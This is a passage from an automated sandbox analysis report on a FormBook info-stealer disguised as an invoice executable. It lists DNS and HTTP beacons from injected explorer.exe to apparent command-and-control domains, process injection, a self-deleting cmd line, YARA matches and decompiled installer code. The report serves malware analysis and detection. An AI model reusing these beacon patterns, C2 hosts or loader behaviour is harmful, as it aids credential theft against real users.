May 12, 2021 07:36:31.456475019 CEST | 8.8.8.8 | 192.168.2.3 | 0x2265 | No error (0) | www.0o-a-8v4l76.net |  | 163.43.122.109 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:37.514128923 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb14 | No error (0) | www.downtoearthwork.com |  | 104.21.46.55 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:37.514128923 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb14 | No error (0) | www.downtoearthwork.com |  | 172.67.223.227 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:42.784970045 CEST | 8.8.8.8 | 192.168.2.3 | 0x2a0d | Server failure (2) | www.smartmatch-dating-api.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:36:47.875988960 CEST | 8.8.8.8 | 192.168.2.3 | 0xad70 | No error (0) | www.topcasino-111.com |  | 87.98.148.38 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:53.064209938 CEST | 8.8.8.8 | 192.168.2.3 | 0xd165 | No error (0) | www.shebagholdings.com |  | 154.84.101.247 | A (IP address) | IN (0x0001)
May 12, 2021 07:36:58.940164089 CEST | 8.8.8.8 | 192.168.2.3 | 0xaaaa | No error (0) | www.booweats.com |  | 64.190.62.111 | A (IP address) | IN (0x0001)
May 12, 2021 07:37:04.174323082 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec2 | No error (0) | www.xn--espacesacr-k7a.com | xn--espacesacr-k7a.com |  | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 07:37:04.174323082 CEST | 8.8.8.8 | 192.168.2.3 | 0x4ec2 | No error (0) | xn--espacesacr-k7a.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 07:37:09.728729963 CEST | 8.8.8.8 | 192.168.2.3 | 0x451d | Name error (3) | www.lingoblasterdiscount.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 07:37:14.937685966 CEST | 8.8.8.8 | 192.168.2.3 | 0xe832 | No error (0) | www.painteredmond.com |  | 192.185.0.218 | A (IP address) | IN (0x0001)

                                                        HTTP Request Dependency Graph


                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49727 | 119.18.54.126 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 07:36:25.546082020 CEST | 1537 | OUT | GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.king-jackpot.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
May 12, 2021 07:36:25.815865040 CEST | 1538 | IN | HTTP/1.1 404 Not Found
                                                        Date: Wed, 12 May 2021 05:36:25 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Wed, 24 Feb 2021 17:47:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 583
                                                        Vary: Accept-Encoding
                                                        Content-Type: text/html
                                                        Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.3 | 49733 | 163.43.122.109 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 12, 2021 07:36:31.764292955 CEST | 1604 | OUT | GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1
                                                        Host: www.0o-a-8v4l76.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:32.071120977 CEST | 3396 | IN | HTTP/1.1 302 Found
                                                        Date: Wed, 12 May 2021 05:36:31 GMT
                                                        Server: Apache/2.2.13 (Unix)
                                                        Location: http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn
                                                        Content-Length: 310
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&amp;iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn">here</a>.</p></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.3 | 49734 | 104.21.46.55 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 12, 2021 07:36:37.560159922 CEST | 6033 | OUT | GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.downtoearthwork.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:37.612606049 CEST | 6034 | IN | HTTP/1.1 301 Moved Permanently
                                                        Date: Wed, 12 May 2021 05:36:37 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Wed, 12 May 2021 06:36:37 GMT
                                                        Location: https://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH
                                                        cf-request-id: 0a00acccd800004ab5f298a000000001
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9b5R7pfybtDNbbE6APLcEI0zQ%2B0r1%2BiHouUEjdrQNb%2FAv87mbz5sBIgFXrhjRVtjB5a8Mu9%2FZRi%2FJ8yhFczUihSJ4lmHqXk%2FI2DhJrSLLXjUzNP6slncdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 64e14a5afc2c4ab5-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.3 | 49736 | 87.98.148.38 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 12, 2021 07:36:47.928524017 CEST | 6068 | OUT | GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.topcasino-111.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:47.980216980 CEST | 6069 | IN | HTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.19.4
                                                        Date: Wed, 12 May 2021 05:36:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: close
                                                        Location: https://topcasino-111.org/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.4</center></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        4 | 192.168.2.3 | 49737 | 154.84.101.247 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 12, 2021 07:36:53.337873936 CEST | 6070 | OUT | GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1
                                                        Host: www.shebagholdings.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:54.001211882 CEST | 6070 | IN | HTTP/1.1 404 Not Found
                                                        Transfer-Encoding: chunked
                                                        Server: IIS Microsoft-HTTPAPI/2.0
                                                        X-Powered-By: IIS
                                                        Date: Wed, 12 May 2021 05:36:53 GMT
                                                        Connection: close
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        5 | 192.168.2.3 | 49738 | 64.190.62.111 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 12, 2021 07:36:58.988852024 CEST | 6071 | OUT | GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.booweats.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:59.068284035 CEST | 6072 | IN | HTTP/1.1 302 Found
                                                        date: Wed, 12 May 2021 05:36:59 GMT
                                                        content-type: text/html; charset=UTF-8
                                                        content-length: 0
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0IkIReecyedsKP0Z3ZUlN8WfOeeXlS8fzoYUbPSm0tTmZySD2nnP3pCqIeh4W5JzjK4yuWca9nv5u9W/WSUVrA==
                                                        expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        pragma: no-cache
                                                        last-modified: Wed, 12 May 2021 05:36:59 GMT
                                                        location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                        x-cache-miss-from: parking-5cc4cbb56f-gdph7
                                                        server: NginX
                                                        connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        6 | 192.168.2.3 | 49741 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        May 12, 2021 07:37:04.217828035 CEST | 6090 | OUT | GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1
                                                        Host: www.xn--espacesacr-k7a.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:37:04.354921103 CEST | 6091 | IN | HTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Wed, 12 May 2021 05:37:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "609953af-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Memory Usage

                                                        High Level Behavior Distribution

                                                        Behavior

                                                        System Behavior

                                                        General

                                                        Start time:07:35:08
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:07:35:09
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:07:35:15
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff714890000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:07:35:29
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                        Imagebase:0xd90000
                                                        File size:78848 bytes
                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x1f0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                          Executed Functions

                                                          C-Code - Quality: 86%
                                                          			_entry_() {
                                                          				signed int _t42;
                                                          				intOrPtr* _t47;
                                                          				CHAR* _t51;
                                                          				char* _t53;
                                                          				CHAR* _t55;
                                                          				void* _t59;
                                                          				intOrPtr _t61;
                                                          				int _t63;
                                                          				int _t66;
                                                          				signed int _t67;
                                                          				int _t68;
                                                          				signed int _t70;
                                                          				void* _t94;
                                                          				signed int _t110;
                                                          				void* _t113;
                                                          				void* _t118;
                                                          				intOrPtr* _t119;
                                                          				char _t122;
                                                          				signed int _t141;
                                                          				signed int _t142;
                                                          				int _t150;
                                                          				void* _t151;
                                                          				intOrPtr* _t153;
                                                          				CHAR* _t156;
                                                          				CHAR* _t157;
                                                          				void* _t159;
                                                          				char* _t160;
                                                          				void* _t163;
                                                          				void* _t164;
                                                          				char _t189;
                                                          
                                                          				 *(_t164 + 0x18) = 0;
                                                          				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                          				 *(_t164 + 0x20) = 0;
                                                          				 *(_t164 + 0x14) = 0x20;
                                                          				SetErrorMode(0x8001); // executed
                                                          				_t42 = GetVersion() & 0xbfffffff;
                                                          				 *0x42f42c = _t42;
                                                          				if(_t42 != 6) {
                                                          					_t119 = E00406500(0);
                                                          					if(_t119 != 0) {
                                                          						 *_t119(0xc00);
                                                          					}
                                                          				}
                                                          				_t156 = "UXTHEME";
                                                          				do {
                                                          					E00406492(_t156); // executed
                                                          					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                          				} while ( *_t156 != 0);
                                                          				E00406500(0xb);
                                                          				 *0x42f424 = E00406500(9);
                                                          				_t47 = E00406500(7);
                                                          				if(_t47 != 0) {
                                                          					_t47 =  *_t47(0x1e);
                                                          					if(_t47 != 0) {
                                                          						 *0x42f42f =  *0x42f42f | 0x00000040;
                                                          					}
                                                          				}
                                                          				__imp__#17(_t159);
                                                          				__imp__OleInitialize(0); // executed
                                                          				 *0x42f4f8 = _t47;
                                                          				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
                                                          				E004060F7("accumulate Setup", "NSIS Error");
                                                          				_t51 = GetCommandLineA();
                                                          				_t160 = "\"C:\\Users\\hardz\\Desktop\\INV74321.exe\" ";
                                                          				E004060F7(_t160, _t51);
                                                          				 *0x42f420 = 0x400000;
                                                          				_t53 = _t160;
                                                          				if("\"C:\\Users\\hardz\\Desktop\\INV74321.exe\" " == 0x22) {
                                                          					 *(_t164 + 0x14) = 0x22;
                                                          					_t53 =  &M00435001;
                                                          				}
                                                          				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
                                                          				 *(_t164 + 0x1c) = _t55;
                                                          				while(1) {
                                                          					_t122 =  *_t55;
                                                          					_t172 = _t122;
                                                          					if(_t122 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t122 - 0x20;
                                                          					if(_t122 != 0x20) {
                                                          						L13:
                                                          						__eflags =  *_t55 - 0x22;
                                                          						 *(_t164 + 0x14) = 0x20;
                                                          						if( *_t55 == 0x22) {
                                                          							_t55 =  &(_t55[1]);
                                                          							__eflags = _t55;
                                                          							 *(_t164 + 0x14) = 0x22;
                                                          						}
                                                          						__eflags =  *_t55 - 0x2f;
                                                          						if( *_t55 != 0x2f) {
                                                          							L25:
                                                          							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
                                                          							__eflags =  *_t55 - 0x22;
                                                          							if(__eflags == 0) {
                                                          								_t55 =  &(_t55[1]);
                                                          								__eflags = _t55;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							_t55 =  &(_t55[1]);
                                                          							__eflags =  *_t55 - 0x53;
                                                          							if( *_t55 != 0x53) {
                                                          								L20:
                                                          								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                          								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                          									L24:
                                                          									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                          									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                          										 *((char*)(_t55 - 2)) = 0;
                                                          										__eflags =  &(_t55[2]);
                                                          										E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
                                                          										L30:
                                                          										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                          										GetTempPathA(0x400, _t157);
                                                          										_t59 = E00403317(_t172);
                                                          										_t173 = _t59;
                                                          										if(_t59 != 0) {
                                                          											L33:
                                                          											DeleteFileA("1033"); // executed
                                                          											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
                                                          											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                          											if(_t61 != 0) {
                                                          												L43:
                                                          												E00403830();
                                                          												__imp__OleUninitialize();
                                                          												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                          												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                          													__eflags =  *0x42f4d4;
                                                          													if( *0x42f4d4 == 0) {
                                                          														L67:
                                                          														_t63 =  *0x42f4ec;
                                                          														__eflags = _t63 - 0xffffffff;
                                                          														if(_t63 != 0xffffffff) {
                                                          															 *(_t164 + 0x14) = _t63;
                                                          														}
                                                          														ExitProcess( *(_t164 + 0x14));
                                                          													}
                                                          													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                          													__eflags = _t66;
                                                          													_t150 = 2;
                                                          													if(_t66 != 0) {
                                                          														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                          														 *(_t164 + 0x38) = 1;
                                                          														 *(_t164 + 0x44) = _t150;
                                                          														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                          													}
                                                          													_t67 = E00406500(4);
                                                          													__eflags = _t67;
                                                          													if(_t67 == 0) {
                                                          														L65:
                                                          														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                          														__eflags = _t68;
                                                          														if(_t68 != 0) {
                                                          															goto L67;
                                                          														}
                                                          														goto L66;
                                                          													} else {
                                                          														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                          														__eflags = _t70;
                                                          														if(_t70 == 0) {
                                                          															L66:
                                                          															E0040140B(9);
                                                          															goto L67;
                                                          														}
                                                          														goto L65;
                                                          													}
                                                          												}
                                                          												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                          												ExitProcess(2);
                                                          											}
                                                          											if( *0x42f440 == 0) {
                                                          												L42:
                                                          												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                                                          												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
                                                          												goto L43;
                                                          											}
                                                          											_t153 = E00405ABA(_t160, 0);
                                                          											if(_t153 < _t160) {
                                                          												L39:
                                                          												_t182 = _t153 - _t160;
                                                          												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                          												if(_t153 < _t160) {
                                                          													_t151 = E0040577E(_t185);
                                                          													lstrcatA(_t157, "~nsu");
                                                          													if(_t151 != 0) {
                                                          														lstrcatA(_t157, "A");
                                                          													}
                                                          													lstrcatA(_t157, ".tmp");
                                                          													_t162 = "C:\\Users\\hardz\\Desktop";
                                                          													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
                                                          														_push(_t157);
                                                          														if(_t151 == 0) {
                                                          															E00405761();
                                                          														} else {
                                                          															E004056E4();
                                                          														}
                                                          														SetCurrentDirectoryA(_t157);
                                                          														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                          														if(_t189 == 0) {
                                                          															E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
                                                          														}
                                                          														E004060F7(0x430000,  *(_t164 + 0x1c));
                                                          														_t137 = "A";
                                                          														_t163 = 0x1a;
                                                          														 *0x430400 = "A";
                                                          														do {
                                                          															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
                                                          															DeleteFileA(0x429450);
                                                          															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\INV74321.exe", 0x429450, 1) != 0) {
                                                          																E00405ED6(_t137, 0x429450, 0);
                                                          																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
                                                          																_t94 = E00405796(0x429450);
                                                          																if(_t94 != 0) {
                                                          																	CloseHandle(_t94);
                                                          																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                          																}
                                                          															}
                                                          															 *0x430400 =  *0x430400 + 1;
                                                          															_t163 = _t163 - 1;
                                                          														} while (_t163 != 0);
                                                          														E00405ED6(_t137, _t157, 0);
                                                          													}
                                                          													goto L43;
                                                          												}
                                                          												 *_t153 = 0;
                                                          												_t154 = _t153 + 4;
                                                          												if(E00405B7D(_t182, _t153 + 4) == 0) {
                                                          													goto L43;
                                                          												}
                                                          												E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
                                                          												E004060F7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
                                                          												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                          												goto L42;
                                                          											}
                                                          											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                          											while( *_t153 != _t110) {
                                                          												_t153 = _t153 - 1;
                                                          												if(_t153 >= _t160) {
                                                          													continue;
                                                          												}
                                                          												goto L39;
                                                          											}
                                                          											goto L39;
                                                          										}
                                                          										GetWindowsDirectoryA(_t157, 0x3fb);
                                                          										lstrcatA(_t157, "\\Temp");
                                                          										_t113 = E00403317(_t173);
                                                          										_t174 = _t113;
